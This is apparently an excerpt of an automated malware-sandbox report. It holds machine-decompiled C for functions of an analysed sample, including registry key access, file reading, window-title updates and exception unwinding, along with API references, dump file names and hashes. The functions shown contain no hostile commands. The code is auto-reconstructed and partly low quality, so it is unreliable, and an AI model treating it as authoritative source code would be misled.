                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2111F75904208AFDB04DFE4D858BBEBBB8FB48304F148158EA11AB281D77D9A45CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                          			E000F1480(void** __ebx, int* __edi, intOrPtr* __esi, void* _a4, char* _a8) {
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t9;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t10;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if( *__esi == 0) {
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(__esi + 4)) == 0) {
                                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						return RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x2001f, 0, __ebx, __edi);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t9 = GetModuleHandleA("Advapi32.dll");
                                                                                                                                                                                                                                                                                          					if(_t9 == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t10 = GetProcAddress(_t9, "RegCreateKeyTransactedA");
                                                                                                                                                                                                                                                                                          						if(_t10 == 0) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							return  *_t10(_a4, _a8, 0, 0, 0, 0x2001f, 0, __ebx, __edi,  *__esi, 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                                          0x000f1486
                                                                                                                                                                                                                                                                                          0x000f14cd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f14cf
                                                                                                                                                                                                                                                                                          0x000f14ed
                                                                                                                                                                                                                                                                                          0x000f14ed
                                                                                                                                                                                                                                                                                          0x000f1488
                                                                                                                                                                                                                                                                                          0x000f148d
                                                                                                                                                                                                                                                                                          0x000f1495
                                                                                                                                                                                                                                                                                          0x000f14f0
                                                                                                                                                                                                                                                                                          0x000f14f6
                                                                                                                                                                                                                                                                                          0x000f1497
                                                                                                                                                                                                                                                                                          0x000f149d
                                                                                                                                                                                                                                                                                          0x000f14a5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f14a7
                                                                                                                                                                                                                                                                                          0x000f14c6
                                                                                                                                                                                                                                                                                          0x000f14c6
                                                                                                                                                                                                                                                                                          0x000f14a5
                                                                                                                                                                                                                                                                                          0x000f1495

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 000F148D
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 000F149D
                                                                                                                                                                                                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000), ref: 000F14E6
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AddressCreateHandleModuleProc
                                                                                                                                                                                                                                                                                          • String ID: Advapi32.dll$RegCreateKeyTransactedA
                                                                                                                                                                                                                                                                                          • API String ID: 1964897782-1184998024
                                                                                                                                                                                                                                                                                          • Opcode ID: 443058a9c3810c39a1063bcc512c6c6c46db32fc00fe2afe0fbedb13789b38a7
                                                                                                                                                                                                                                                                                          • Instruction ID: 929231ce8847f9520e6d9d3b8138dafe0921c1f384be9c75cf3b4628ff595faf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 443058a9c3810c39a1063bcc512c6c6c46db32fc00fe2afe0fbedb13789b38a7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A011271380308BAE6349A949C49FB7779DA7D8B40F20C019B744AB5C5C6F1B890D664
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000F8380(void* __eax, void* __eflags, CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t26 = __eax;
                                                                                                                                                                                                                                                                                          				_t27 = __eax + 0x250;
                                                                                                                                                                                                                                                                                          				_t21 = E000F71E0(_a4, _t27);
                                                                                                                                                                                                                                                                                          				if(_t21 == 0) {
                                                                                                                                                                                                                                                                                          					MessageBoxA( *(_t26 + 4), "Error reading file!\n", 0x11293e, 0);
                                                                                                                                                                                                                                                                                          					return _t21;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					lstrcpyA(_t27 + 0x58, _a4);
                                                                                                                                                                                                                                                                                          					lstrcpyA(_t27 + 0x15c, _a8);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t27 + 4), 0xb9, 0, 0);
                                                                                                                                                                                                                                                                                          					E000F8160(_t26);
                                                                                                                                                                                                                                                                                          					return _t21;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x000f8386
                                                                                                                                                                                                                                                                                          0x000f838b
                                                                                                                                                                                                                                                                                          0x000f8397
                                                                                                                                                                                                                                                                                          0x000f839b
                                                                                                                                                                                                                                                                                          0x000f83ed
                                                                                                                                                                                                                                                                                          0x000f83f9
                                                                                                                                                                                                                                                                                          0x000f839d
                                                                                                                                                                                                                                                                                          0x000f83a5
                                                                                                                                                                                                                                                                                          0x000f83b6
                                                                                                                                                                                                                                                                                          0x000f83c9
                                                                                                                                                                                                                                                                                          0x000f83cf
                                                                                                                                                                                                                                                                                          0x000f83da
                                                                                                                                                                                                                                                                                          0x000f83da

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F71E0: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,08000080,00000000), ref: 000F71FA
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,?,?,000F8327,?,?), ref: 000F83A5
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00112D54,?,?,?,?,000F8327,?,?), ref: 000F83B6
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B9,00000000,00000000), ref: 000F83C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrlenA.KERNEL32(?,?,?), ref: 000F8182
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: LoadStringA.USER32 ref: 000F81A2
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrlenA.KERNEL32(?,?,?), ref: 000F81AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcpyA.KERNEL32(?,?,?,?), ref: 000F81C4
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?,00112A2C), ref: 000F81DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?, - ), ref: 000F81E7
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?,?,?, - ), ref: 000F81F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: SetWindowTextA.USER32(?), ref: 000F81F8
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 000F83ED
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcatlstrcpy$Messagelstrlen$CreateFileLoadSendStringTextWindow
                                                                                                                                                                                                                                                                                          • String ID: Error reading file!
                                                                                                                                                                                                                                                                                          • API String ID: 3921680268-1254819211
                                                                                                                                                                                                                                                                                          • Opcode ID: ead8b697e2855381caec1eef21a386b434dce13f193e7ddd92f0a8725da5fc9b
                                                                                                                                                                                                                                                                                          • Instruction ID: fd728e72fe39910ca29cb088f641efadcdd7dc5758b9f6e08986a77d86082230
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ead8b697e2855381caec1eef21a386b434dce13f193e7ddd92f0a8725da5fc9b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39016237340608BFD714ABA9ED85FDBB7ACFB88714F10812AF71597550CAB0E94587A0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 27%
                                                                                                                                                                                                                                                                                          			E0010E9AE(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t23 = __ecx;
                                                                                                                                                                                                                                                                                          				_t22 = __ebx;
                                                                                                                                                                                                                                                                                          				_t30 = _a20;
                                                                                                                                                                                                                                                                                          				if(_a20 != 0) {
                                                                                                                                                                                                                                                                                          					_push(_a20);
                                                                                                                                                                                                                                                                                          					_push(__ebx);
                                                                                                                                                                                                                                                                                          					_push(__esi);
                                                                                                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                                                                                                          					E0010E91C(__ebx, __edi, __esi, _t30);
                                                                                                                                                                                                                                                                                          					_t28 = _t28 + 0x10;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t31 = _a28;
                                                                                                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                                                                                                          				if(_a28 != 0) {
                                                                                                                                                                                                                                                                                          					_push(_a28);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_push(_t27);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E0010DF11(_t23);
                                                                                                                                                                                                                                                                                          				_push( *_t26);
                                                                                                                                                                                                                                                                                          				_push(_a16);
                                                                                                                                                                                                                                                                                          				_push(_a12);
                                                                                                                                                                                                                                                                                          				_push(_t27);
                                                                                                                                                                                                                                                                                          				E0010E39E(_t22, _t25, _t26, _t27, _t31);
                                                                                                                                                                                                                                                                                          				_push(0x100);
                                                                                                                                                                                                                                                                                          				_push(_a24);
                                                                                                                                                                                                                                                                                          				_push(_a16);
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                                                                                                                                                                                                                                                                          				_push(_a8);
                                                                                                                                                                                                                                                                                          				_t14 = _t22 + 0xc; // 0x6e
                                                                                                                                                                                                                                                                                          				_push(_t27);
                                                                                                                                                                                                                                                                                          				_push(_a4);
                                                                                                                                                                                                                                                                                          				_t20 = E0010E601(_t22,  *_t14, _t26, _t27, _t31);
                                                                                                                                                                                                                                                                                          				if(_t20 != 0) {
                                                                                                                                                                                                                                                                                          					E0010DED8(_t20, _t27);
                                                                                                                                                                                                                                                                                          					return _t20;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t20;
                                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                                          0x0010e9ae
                                                                                                                                                                                                                                                                                          0x0010e9ae
                                                                                                                                                                                                                                                                                          0x0010e9ae
                                                                                                                                                                                                                                                                                          0x0010e9ae
                                                                                                                                                                                                                                                                                          0x0010e9b3
                                                                                                                                                                                                                                                                                          0x0010e9b7
                                                                                                                                                                                                                                                                                          0x0010e9b9
                                                                                                                                                                                                                                                                                          0x0010e9bc
                                                                                                                                                                                                                                                                                          0x0010e9bd
                                                                                                                                                                                                                                                                                          0x0010e9be
                                                                                                                                                                                                                                                                                          0x0010e9c1
                                                                                                                                                                                                                                                                                          0x0010e9c6
                                                                                                                                                                                                                                                                                          0x0010e9c6
                                                                                                                                                                                                                                                                                          0x0010e9c9
                                                                                                                                                                                                                                                                                          0x0010e9cd
                                                                                                                                                                                                                                                                                          0x0010e9d0
                                                                                                                                                                                                                                                                                          0x0010e9d5
                                                                                                                                                                                                                                                                                          0x0010e9d2
                                                                                                                                                                                                                                                                                          0x0010e9d2
                                                                                                                                                                                                                                                                                          0x0010e9d2
                                                                                                                                                                                                                                                                                          0x0010e9d8
                                                                                                                                                                                                                                                                                          0x0010e9dd
                                                                                                                                                                                                                                                                                          0x0010e9df
                                                                                                                                                                                                                                                                                          0x0010e9e2
                                                                                                                                                                                                                                                                                          0x0010e9e5
                                                                                                                                                                                                                                                                                          0x0010e9e6
                                                                                                                                                                                                                                                                                          0x0010e9ee
                                                                                                                                                                                                                                                                                          0x0010e9f3
                                                                                                                                                                                                                                                                                          0x0010e9f7
                                                                                                                                                                                                                                                                                          0x0010e9fa
                                                                                                                                                                                                                                                                                          0x0010e9fd
                                                                                                                                                                                                                                                                                          0x0010ea00
                                                                                                                                                                                                                                                                                          0x0010ea03
                                                                                                                                                                                                                                                                                          0x0010ea04
                                                                                                                                                                                                                                                                                          0x0010ea07
                                                                                                                                                                                                                                                                                          0x0010ea11
                                                                                                                                                                                                                                                                                          0x0010ea15
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010ea15
                                                                                                                                                                                                                                                                                          0x0010ea1b

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • ___BuildCatchObject.LIBCMT ref: 0010E9C1
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010E91C: ___BuildCatchObjectHelper.LIBCMT ref: 0010E952
                                                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 0010E9D8
                                                                                                                                                                                                                                                                                          • ___FrameUnwindToState.LIBCMT ref: 0010E9E6
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                                                          • API String ID: 2163707966-3733052814
                                                                                                                                                                                                                                                                                          • Opcode ID: a3b6e0bba8c6188151cdd87e1afa2bcb579a1f25e0b14c436fbadd08ef490303
                                                                                                                                                                                                                                                                                          • Instruction ID: 7189ae0410b4c08784ea4c01cf2b8986bc883ba92fc107fff47a52265b977eaa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3b6e0bba8c6188151cdd87e1afa2bcb579a1f25e0b14c436fbadd08ef490303
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6801F671001119BBDF12AF52CC45EAA7FAAFF29354F004414BD98151A1D7B2D9B1DBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                          			E000F1410(int __ebx, void** __edi, intOrPtr* __esi, void* _a4, char* _a8) {
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t9;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t10;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if( *__esi == 0) {
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(__esi + 4)) == 0) {
                                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						return RegOpenKeyExA(_a4, _a8, 0, __ebx, __edi);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t9 = GetModuleHandleA("Advapi32.dll");
                                                                                                                                                                                                                                                                                          					if(_t9 == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t10 = GetProcAddress(_t9, "RegOpenKeyTransactedA");
                                                                                                                                                                                                                                                                                          						if(_t10 == 0) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							return  *_t10(_a4, _a8, 0, __ebx, __edi,  *__esi, 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                                          0x000f1416
                                                                                                                                                                                                                                                                                          0x000f1452
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f1454
                                                                                                                                                                                                                                                                                          0x000f1467
                                                                                                                                                                                                                                                                                          0x000f1467
                                                                                                                                                                                                                                                                                          0x000f1418
                                                                                                                                                                                                                                                                                          0x000f141d
                                                                                                                                                                                                                                                                                          0x000f1425
                                                                                                                                                                                                                                                                                          0x000f146a
                                                                                                                                                                                                                                                                                          0x000f1470
                                                                                                                                                                                                                                                                                          0x000f1427
                                                                                                                                                                                                                                                                                          0x000f142d
                                                                                                                                                                                                                                                                                          0x000f1435
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f1437
                                                                                                                                                                                                                                                                                          0x000f144b
                                                                                                                                                                                                                                                                                          0x000f144b
                                                                                                                                                                                                                                                                                          0x000f1435
                                                                                                                                                                                                                                                                                          0x000f1425

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 000F141D
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 000F142D
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000), ref: 000F1460
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleOpenProc
                                                                                                                                                                                                                                                                                          • String ID: Advapi32.dll$RegOpenKeyTransactedA
                                                                                                                                                                                                                                                                                          • API String ID: 1337834000-496252237
                                                                                                                                                                                                                                                                                          • Opcode ID: fa0ae69ae63515962b7e03f7fe5e58de655c932279e2c1a9eb6688598fe34cf6
                                                                                                                                                                                                                                                                                          • Instruction ID: e2e99deeffef6c805c6105406125287dfc0869a016b46c7c708926d9e96ac013
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0ae69ae63515962b7e03f7fe5e58de655c932279e2c1a9eb6688598fe34cf6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63F0F97124030CABE6689BA5ED48FB777ACEBD8B41F20C019F64996990C6B5E890D770
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000F8220(void* __eax, void* __eflags) {
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t20 = __eax;
                                                                                                                                                                                                                                                                                          				_t7 = E000F72C0(_t15, __eax + 0x250);
                                                                                                                                                                                                                                                                                          				if(_t7 != 0) {
                                                                                                                                                                                                                                                                                          					SetWindowTextA( *(_t20 + 0x254), 0);
                                                                                                                                                                                                                                                                                          					lstrcpyA(_t20 + 0x2a8, 0x11293e);
                                                                                                                                                                                                                                                                                          					lstrcpyA(_t20 + 0x3ac, "Untitled");
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t20 + 0x254), 0xb9, 0, 0);
                                                                                                                                                                                                                                                                                          					return E000F8160(_t20);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x000f8223
                                                                                                                                                                                                                                                                                          0x000f822b
                                                                                                                                                                                                                                                                                          0x000f8232
                                                                                                                                                                                                                                                                                          0x000f823d
                                                                                                                                                                                                                                                                                          0x000f8255
                                                                                                                                                                                                                                                                                          0x000f8263
                                                                                                                                                                                                                                                                                          0x000f8275
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f827b
                                                                                                                                                                                                                                                                                          0x000f8283

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F72C0: SendMessageA.USER32(?,000000B8,00000000,00000000), ref: 000F72E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F72C0: GetParent.USER32(?), ref: 000F72F2
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F72C0: wsprintfA.USER32 ref: 000F730D
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F72C0: MessageBoxA.USER32 ref: 000F7325
                                                                                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 000F823D
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,0011293E,?,?,?,000F7AB8), ref: 000F8255
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,Untitled,?,?,?,000F7AB8), ref: 000F8263
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B9,00000000,00000000), ref: 000F8275
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrlenA.KERNEL32(?,?,?), ref: 000F8182
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: LoadStringA.USER32 ref: 000F81A2
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrlenA.KERNEL32(?,?,?), ref: 000F81AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcpyA.KERNEL32(?,?,?,?), ref: 000F81C4
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?,00112A2C), ref: 000F81DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?, - ), ref: 000F81E7
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?,?,?, - ), ref: 000F81F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: SetWindowTextA.USER32(?), ref: 000F81F8
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
